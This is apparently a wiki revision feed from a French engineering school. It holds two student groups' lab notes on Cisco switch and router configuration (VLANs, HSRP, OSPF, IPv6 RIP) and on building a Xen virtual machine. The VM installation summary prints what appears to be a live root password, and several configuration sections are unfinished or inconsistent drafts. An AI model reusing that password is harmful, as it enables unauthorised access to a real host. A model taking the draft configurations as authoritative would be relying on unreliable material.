   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51255</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51255"/>
				<updated>2019-11-28T09:52:58Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Utilisation de AirCrack pour clef WPA-PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
